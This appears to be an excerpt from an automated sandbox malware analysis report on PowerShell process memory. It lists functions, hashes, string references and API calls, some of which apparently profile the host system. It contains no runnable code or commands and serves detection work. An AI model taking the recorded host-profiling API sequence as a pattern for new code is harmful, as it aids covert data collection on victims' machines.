Opcode Fuzzy Hash: 1dd3fcb3f9b4bf50ffe6bf4ebd15895c323de73c6ff81417fa6b9330a0db4845
Instruction Fuzzy Hash: A1E08C34909208DBCB04DFA4D4805ACBBB4AB45310F2081998C0893351D733AE52DB80

Function 04657908 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3273847306.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f813914fb9f8b9d1dd9c612f6c0304b63d546d1503d35d29efd3936c034c8eb
Instruction ID: 356a7664d7753f392a997ff7a0b97d731a576b3942a13fc38cd41fd677b1d5e7
Opcode Fuzzy Hash: 3f813914fb9f8b9d1dd9c612f6c0304b63d546d1503d35d29efd3936c034c8eb
Instruction Fuzzy Hash: 04C02B300C13084AD20033E8784C368739C9B1033FF800C14E90C103209FB1A8F4C97B

Function 081E7282 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5888ce4e9bc3d6f838aa7ffa70a798f56a6336e67120959e2df78efb129470ff
Instruction ID: 5bc84aa104614bc0f6e44f9008f616a7e9a16873413634e8b7e03b6528651ef0
Opcode Fuzzy Hash: 5888ce4e9bc3d6f838aa7ffa70a798f56a6336e67120959e2df78efb129470ff
Instruction Fuzzy Hash: 7AC04C76E1011E9BCF14DBD9E4419DCF7B4EF94322F008036D214A7104D6315526CF50

Non-executed Functions

Function 075790B9 Relevance: 13.9, Strings: 11, Instructions: 191COMMON

Download Yara Rule

Strings

TQoq, xrefs: 07579259
4'jq, xrefs: 0757921A
tPjq, xrefs: 075791AD
tPjq, xrefs: 075791A1
4'jq, xrefs: 0757915B
TQoq, xrefs: 07579269
4'jq, xrefs: 07579295
4'jq, xrefs: 07579289
4'jq, xrefs: 0757914F
4'jq, xrefs: 0757920A
TQoq, xrefs: 075790F5

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$TQoq$TQoq$TQoq$tPjq$tPjq
API String ID: 0-4199185445
Opcode ID: 1ac0e82789dea926a2e7cd8b2d2a5424e3b87e1774657def7d978a57584e5b65
Instruction ID: fa7aba8925e09c5565457bff3f81244317b95173b135a93fb5150ac29d98b055
Opcode Fuzzy Hash: 1ac0e82789dea926a2e7cd8b2d2a5424e3b87e1774657def7d978a57584e5b65
Instruction Fuzzy Hash: FD61F5B074020ACFCB149F68E554AEABBA6FF85310F64886BD8015B294CB72ED55C7B1

Function 07578760 Relevance: 11.7, Strings: 9, Instructions: 412COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07578C42
4'jq, xrefs: 07578C36
4'jq, xrefs: 07578A53
4'jq, xrefs: 075788B3
TQoq, xrefs: 07578C01
4'jq, xrefs: 075788BF
TQoq, xrefs: 07578C11
4'jq, xrefs: 07578A47
TQoq, xrefs: 07578B88

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$TQoq$TQoq$TQoq
API String ID: 0-2807812125
Opcode ID: 75c0b77ab742d6dd933dfa1a087786e78ae0670f7681414ef0ed47f3034f9705
Instruction ID: 6d496f26c137d505d566f223b14cc6484c866a077c3575396a006dc89a0dd875
Opcode Fuzzy Hash: 75c0b77ab742d6dd933dfa1a087786e78ae0670f7681414ef0ed47f3034f9705
Instruction Fuzzy Hash: 96D15BB170020ADFCB158F69E8186FBBBA6FF85310F14886BD815CB291DB35E945C7A1

Function 07579557 Relevance: 10.1, Strings: 8, Instructions: 115COMMON

Download Yara Rule

Strings

4'jq, xrefs: 0757959A
tPjq, xrefs: 075795E2
tPjq, xrefs: 075795EE
4'jq, xrefs: 075796A2
4'jq, xrefs: 07579650
4'jq, xrefs: 07579640
4'jq, xrefs: 0757958E
4'jq, xrefs: 075796AE

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq
API String ID: 0-1712124786
Opcode ID: 97c77ffe34dc900c792d71fb267beeadffaff2550f2e8c29566cf6f280ad7293
Instruction ID: ce8eda3af2a5680c5e2e84040ab23e590ada7bf58ed35db9d484aa057e12d050
Opcode Fuzzy Hash: 97c77ffe34dc900c792d71fb267beeadffaff2550f2e8c29566cf6f280ad7293
Instruction Fuzzy Hash: 6A41A3B0B401159FCB148B589550AEABBE6FF99310FA4C55AD801AF394CB71ED41C7B1

Function 075725D8 Relevance: 8.9, Strings: 7, Instructions: 171COMMON

Download Yara Rule

Strings

$jq, xrefs: 075726EC
$jq, xrefs: 075726CA
$jq, xrefs: 075726AE
$jq, xrefs: 0757268D
4'jq, xrefs: 07572878
$jq, xrefs: 07572848
tPjq, xrefs: 0757278A

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$tPjq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-4171136763
Opcode ID: 8663e089518c1285be86bad817f5a09504066eb7e216cf98418a05aded848fe4
Instruction ID: 3a365cb6c9411cd342a7245c0bedf5f1848baf01411a478075946489b6de1f7b
Opcode Fuzzy Hash: 8663e089518c1285be86bad817f5a09504066eb7e216cf98418a05aded848fe4
Instruction Fuzzy Hash: AB5194B061020ADFDB24CE15E544BEAB7F2FB45710F19C46BE815AB291CB32DD80CB61

Function 06F51257 Relevance: 7.8, Strings: 6, Instructions: 279COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06F514B3
4'jq, xrefs: 06F514C9
4'jq, xrefs: 06F51425
x.sh, xrefs: 06F5164C
4'jq, xrefs: 06F5140F
-sh, xrefs: 06F5169A

Memory Dump Source

Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$x.sh$-sh
API String ID: 0-356292745
Opcode ID: f5c9f1786035529e52ca7b427e493e7fa32c18a449fbbc82daded270e9276d43
Instruction ID: 6beab208f4e0e7fe39aa763918dae291831c06b185572d769d47db381fdb267a
Opcode Fuzzy Hash: f5c9f1786035529e52ca7b427e493e7fa32c18a449fbbc82daded270e9276d43
Instruction Fuzzy Hash: AAC171B0B002189FDB54DB14C994B9ABBB6FF85304F5085D9DA096B345CB31AEC1CFA1

Function 06F50048 Relevance: 6.7, Strings: 5, Instructions: 493COMMON

Download Yara Rule

Strings

x.sh, xrefs: 06F50670
h2uh, xrefs: 06F53FEC
4'jq, xrefs: 06F50442
-sh, xrefs: 06F506BE
4'jq, xrefs: 06F50458

Memory Dump Source

Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$h2uh$x.sh$-sh
API String ID: 0-442816374
Opcode ID: 3735ce7ed501e3cbaa3eadf12ae10f41a414e469d5dfdb53958889475cf354e2
Instruction ID: 2cb27f1dc700330843bab00de67a147f1db769f40efc87200fbd719209c100f2
Opcode Fuzzy Hash: 3735ce7ed501e3cbaa3eadf12ae10f41a414e469d5dfdb53958889475cf354e2
Instruction Fuzzy Hash: D52272B0E002189FDB54DB54C954BADBBB6EF84304F5184A9DA096F346CB31AEC5CFA1

Function 07573309 Relevance: 6.4, Strings: 5, Instructions: 138COMMON

Download Yara Rule

Strings

4'jq, xrefs: 075734EA
$jq, xrefs: 07573437
$jq, xrefs: 07573410
$jq, xrefs: 075733CE
$jq, xrefs: 0757349C

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$$jq$$jq$$jq$$jq
API String ID: 0-651010669
Opcode ID: 1106df0dc4849ebad4944f7ea8afd8a8495f12616fbfa94b3a417a6559326d8f
Instruction ID: fc49faeb49c354af3bf103172a93774598724a9bd0925beef792ad068e693761
Opcode Fuzzy Hash: 1106df0dc4849ebad4944f7ea8afd8a8495f12616fbfa94b3a417a6559326d8f
Instruction Fuzzy Hash: 8D51A1F1A1028ADFCF2A8F19E9096E67BA2BF42331F448467E8054B191DB35DD84EB51

Function 07572368 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

$jq, xrefs: 075724BB
$jq, xrefs: 07572456
$jq, xrefs: 0757240E
4'jq, xrefs: 075724EA
$jq, xrefs: 0757242F

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$$jq$$jq$$jq$$jq
API String ID: 0-651010669
Opcode ID: 34198e2cbe3aac87c6fa244b4aa84686461fcf061e346ef5724b77a4ca680621
Instruction ID: 2826b76d65cee3d74fda2e3fa0c5a8242568cf940cf0827a6324628fae62c70c
Opcode Fuzzy Hash: 34198e2cbe3aac87c6fa244b4aa84686461fcf061e346ef5724b77a4ca680621
Instruction Fuzzy Hash: 94419AF0A1420ADFCF24CE1AE5457EA77B2FF42311F94846BE8198B290D735D984CB51

Function 075773F0 Relevance: 6.4, Strings: 5, Instructions: 106COMMON

Download Yara Rule

Strings

4'jq, xrefs: 0757755E
$jq, xrefs: 07577490
$jq, xrefs: 075774AC
$jq, xrefs: 075774CE
$jq, xrefs: 0757751C

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$$jq$$jq$$jq$$jq
API String ID: 0-651010669
Opcode ID: 2e72a8293caae8882e0fd6a258940583dc3d9fa062102da28f669c96c59c51cc
Instruction ID: afe295c31bb3e8edfc02af0fe2e65a999057b5d4e7120e6b0b2a0816b369c9ec
Opcode Fuzzy Hash: 2e72a8293caae8882e0fd6a258940583dc3d9fa062102da28f669c96c59c51cc
Instruction Fuzzy Hash: 1D3182F1A00206DFDF248F25F541BFA7BA6BB89614F948CABE4059B250D731D980CBA1

Function 075751C0 Relevance: 6.3, Strings: 5, Instructions: 93COMMON

Download Yara Rule

Strings

$jq, xrefs: 0757527E
$jq, xrefs: 07575254
$jq, xrefs: 075752D3
$jq, xrefs: 07575233
4'jq, xrefs: 075752FB

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$$jq$$jq$$jq$$jq
API String ID: 0-651010669
Opcode ID: ab2a3159706288bb4daf5e39732220aac34df47a3e56e48d616d74628f10c4b3
Instruction ID: 82c71bb600d8cb91fccdbe7bd097c90866f59cd76656c1cb99eb26068d6e8ec1
Opcode Fuzzy Hash: ab2a3159706288bb4daf5e39732220aac34df47a3e56e48d616d74628f10c4b3
Instruction Fuzzy Hash: 9131ABF1A1430ACFCF208E55E5406EA77B5FB42210F28846BD805DB2A1F772CD64CBA1

Function 07572890 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

$jq, xrefs: 07572994
(ojq, xrefs: 075728D3
(ojq, xrefs: 075728DF
tPjq, xrefs: 07572A17

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$tPjq$$jq
API String ID: 0-3857383769
Opcode ID: 6d6ac120e5400d8c97d834e9d4a68afac63db81e37e11e929366d918a9c9dbeb
Instruction ID: 3d8bc0d1c67ac156eb071475c3b31221ff09ca13a07952b6198119c61d4d240c
Opcode Fuzzy Hash: 6d6ac120e5400d8c97d834e9d4a68afac63db81e37e11e929366d918a9c9dbeb
Instruction Fuzzy Hash: 2B411BB1A002559FCB258F58E940BE6BBF5FF85310F5884ABD9049F282CB71DD85C7A2

Function 07570750 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$jq, xrefs: 07570762
$jq, xrefs: 075707B8
$jq, xrefs: 075707AC
$jq, xrefs: 0757077E

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq
API String ID: 0-2428501249
Opcode ID: 81af71dd95b01f59480527a9e6421c10e85dc924e7ecd736f0d693ea8f164080
Instruction ID: aa0af2896a7724c44ea255ca161eab575aaf96840595eb964503412bf70f130b
Opcode Fuzzy Hash: 81af71dd95b01f59480527a9e6421c10e85dc924e7ecd736f0d693ea8f164080
Instruction Fuzzy Hash: BA2123B13142065FEB24952AA9007B7A7DAFBC1711F64882BA849DF3C1DD75D841C7A1

Function 0757030A Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

$jq, xrefs: 07570352
$jq, xrefs: 0757035E
4'jq, xrefs: 07570373
4'jq, xrefs: 0757037F

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: 0c57728e131d7ed81b63293c3b9c0266dbe4cc68cdc022ae33cc3f4c412577ce
Instruction ID: d759b7f00d982a17b2e9e17cf6ab8798c8804df0c0233091cd66488ffaaf5b35
Opcode Fuzzy Hash: 0c57728e131d7ed81b63293c3b9c0266dbe4cc68cdc022ae33cc3f4c412577ce
Instruction Fuzzy Hash: 8D01BC5130A39A4FC327062929200A67FB7AFC351032940DBC889DF3D7CA248D09C3A7

Analysis Process: powershell.exePID: 7448, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	36.1%
Total number of Nodes:	302
Total number of Limit Nodes:	18

Executed Functions

Function 005265E0 Relevance: 27.0, APIs: 12, Strings: 3, Instructions: 788
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0053068C,00000000,00000001,0053067C,00000000), ref: 00526819
SysAllocString.OLEAUT32(83CD81D2), ref: 005268B8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 005268F8
SysAllocString.OLEAUT32(83CD81D2), ref: 00526947
SysAllocString.OLEAUT32(83CD81D2), ref: 005269D7
VariantInit.OLEAUT32(09:;), ref: 00526A42
SysFreeString.OLEAUT32(?), ref: 00526D50
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,798B7F53,00000000,00000000,00000000,00000000), ref: 00526D88

Strings

09:;, xrefs: 00526614
, xrefs: 0052672F
C, xrefs: 00526725

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: $09:;$C
API String ID: 505850577-3421538064
Opcode ID: c3144c1515703f343faea833604abd621322c737a1a41d0a0c3cf3b10fc88f60
Instruction ID: 65a60f1870a4c894baa233cf2502e09bc3005cfa8d2c710418d69d62f182c6e0
Opcode Fuzzy Hash: c3144c1515703f343faea833604abd621322c737a1a41d0a0c3cf3b10fc88f60
Instruction Fuzzy Hash: FE32FE726083508FD714CF29D8817ABBBE6EFD6314F18892CE594DB391D674D80ACB92

Function 00501A70 Relevance: 14.7, APIs: 4, Strings: 3, Instructions: 2455COMMON

Download Yara Rule

Strings

`, xrefs: 00502C4F
, xrefs: 00503067, 00503026
D, xrefs: 005035B0

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: D$`$
API String ID: 0-4294123104
Opcode ID: 44b6b0f53c61e784838eef305ea97bab82deb42f9ba4229a99cdafc0253c4dc2
Instruction ID: 0ad4dfa1c6f02e30427d471bf8c392f92c715f20eab7e92557f4812d4a1937ae
Opcode Fuzzy Hash: 44b6b0f53c61e784838eef305ea97bab82deb42f9ba4229a99cdafc0253c4dc2
Instruction Fuzzy Hash: 60231271D083948FDB14CB38C8497ADBFF1AF46320F0986ADD8999B3D2D6358A45CB52

Function 005004AC Relevance: 11.3, APIs: 1, Strings: 5, Instructions: 797
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9, xrefs: 005005C7
g, xrefs: 00500DB9
), xrefs: 00500760
l, xrefs: 00500998
z, xrefs: 005008D9

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: )$9$g$l$z
API String ID: 0-269890479
Opcode ID: a353640b3a3af9cd032289f111d3e93a56083f190321021733db77fac054ba16
Instruction ID: 22b7f936e929c51deea6fb5deb574b77d4f8fc6dd82b2f107a240a829685dc28
Opcode Fuzzy Hash: a353640b3a3af9cd032289f111d3e93a56083f190321021733db77fac054ba16
Instruction Fuzzy Hash: BA62717160D7808BD364DB38C8953AFBFD2ABD5324F198E2EE5D9873D1DA3885458B02

Function 004F8640 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 241
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004F8664
GetCurrentThreadId.KERNEL32 ref: 004F866E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004F86C9
GetForegroundWindow.USER32 ref: 004F8803
ExitProcess.KERNEL32 ref: 004F8929

Strings

(i, xrefs: 004F8799, 004F8910

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: (i
API String ID: 4063528623-310932114
Opcode ID: 51bccfa34b6c20ec21e2c3a7b8d1854d5c9e0c8315ce43fb5de5f1ef9c0045dc
Instruction ID: 2eeb98cea0e5be074a98d739268cf2c95de03316251b704a219c19b09e6403e2
Opcode Fuzzy Hash: 51bccfa34b6c20ec21e2c3a7b8d1854d5c9e0c8315ce43fb5de5f1ef9c0045dc
Instruction Fuzzy Hash: 4A718AB3B443044BD308AF69DC8536ABAD3ABC5310F0DD53EA598CB391EA7CD8049645

Function 0051B744 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)I5|, xrefs: 0051BC16
Ju)y, xrefs: 0051BBFF
#, xrefs: 0051BC0F
', xrefs: 0051BBA3

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: #$'$)I5|$Ju)y
API String ID: 0-2458968036
Opcode ID: ceb9aa8c118d296bd35d0ee2ab650c49ec5c49e944e9e5b9047e8011d6b2efbe
Instruction ID: 73236d77f37ce734bd18b82b42c92425ef32accefae35ecc1a480cb27984b0f9
Opcode Fuzzy Hash: ceb9aa8c118d296bd35d0ee2ab650c49ec5c49e944e9e5b9047e8011d6b2efbe
Instruction Fuzzy Hash: B5D1F671A1C3918BE729CF39C8913EBBFD1AFAA304F18896DD4C997291D7348905CB52

Function 0051BA95 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0051BB85

Strings

)I5|, xrefs: 0051BC16
Ju)y, xrefs: 0051BBFF
#, xrefs: 0051BC0F
', xrefs: 0051BBA3

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: #$'$)I5|$Ju)y
API String ID: 3960555810-2458968036
Opcode ID: 740988690191e2436073ede454a99baee4775620c037a228ccf1044c86963d33
Instruction ID: 15f380518f87a852a6d8471f5dd2ee1220ac62cfff9743c211009dd07cdab4e9
Opcode Fuzzy Hash: 740988690191e2436073ede454a99baee4775620c037a228ccf1044c86963d33
Instruction Fuzzy Hash: 8AB1D47161C3818BE729CF39C8A07EBBFD1AFAA304F18496DD4C997292D7358905CB52

Function 005123B0 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 525
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0051245E
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 005124FA

Strings

gd, xrefs: 005129E8

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: gd
API String ID: 237503144-565856990
Opcode ID: 4857ec9e1ecc941e0a526a55b76d8b5f7216d50d17141728e63db6e0e0f6c3d6
Instruction ID: 734f28ccc05520b3f43fe5e4ceb1da046521c1c11372de1293860e45e4f1e18f
Opcode Fuzzy Hash: 4857ec9e1ecc941e0a526a55b76d8b5f7216d50d17141728e63db6e0e0f6c3d6
Instruction Fuzzy Hash: 9FF11FB15083408FE718DF69D89166BBBE1FFA5304F14892CF5C68B381E7789949CB86

Function 00508592 Relevance: 6.6, Strings: 5, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>%:', xrefs: 005085B7
<6>r, xrefs: 005085A1
8,%/, xrefs: 005085AC
W, xrefs: 005085CC
!+, xrefs: 005085C2

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: !+$8,%/$<6>r$>%:'$W
API String ID: 0-3126514706
Opcode ID: 5338923224796c9b9284561d234598230bd40dbe0be85eebcc11c192b4b19bb3
Instruction ID: c45c11d25421256490c5aa63d4b7add1453a9e2dbd95041ec1d998294bbd2043
Opcode Fuzzy Hash: 5338923224796c9b9284561d234598230bd40dbe0be85eebcc11c192b4b19bb3
Instruction Fuzzy Hash: 01B127B2A083409BD7248F24C8527BFBBA1FF95314F18892DE8CA87391EB359915C756

Function 004FADE9 Relevance: 4.0, Strings: 3, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

=:, xrefs: 004FB07C
<", xrefs: 004FB072
), xrefs: 004FB086

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: )$<"$=:
API String ID: 0-3239783174
Opcode ID: ff15188a947fbd8df178f22e07721fd691de8b26673217a90ce26f84b0b05013
Instruction ID: 614baffe267b8b945144e16b62ced3c6b819ed23755f6e36841fef4a71e84243
Opcode Fuzzy Hash: ff15188a947fbd8df178f22e07721fd691de8b26673217a90ce26f84b0b05013
Instruction Fuzzy Hash: 989181B4A05B42DFD3158F25C991381BFB1FF12310F05879AC5698BA92D738B429CF95

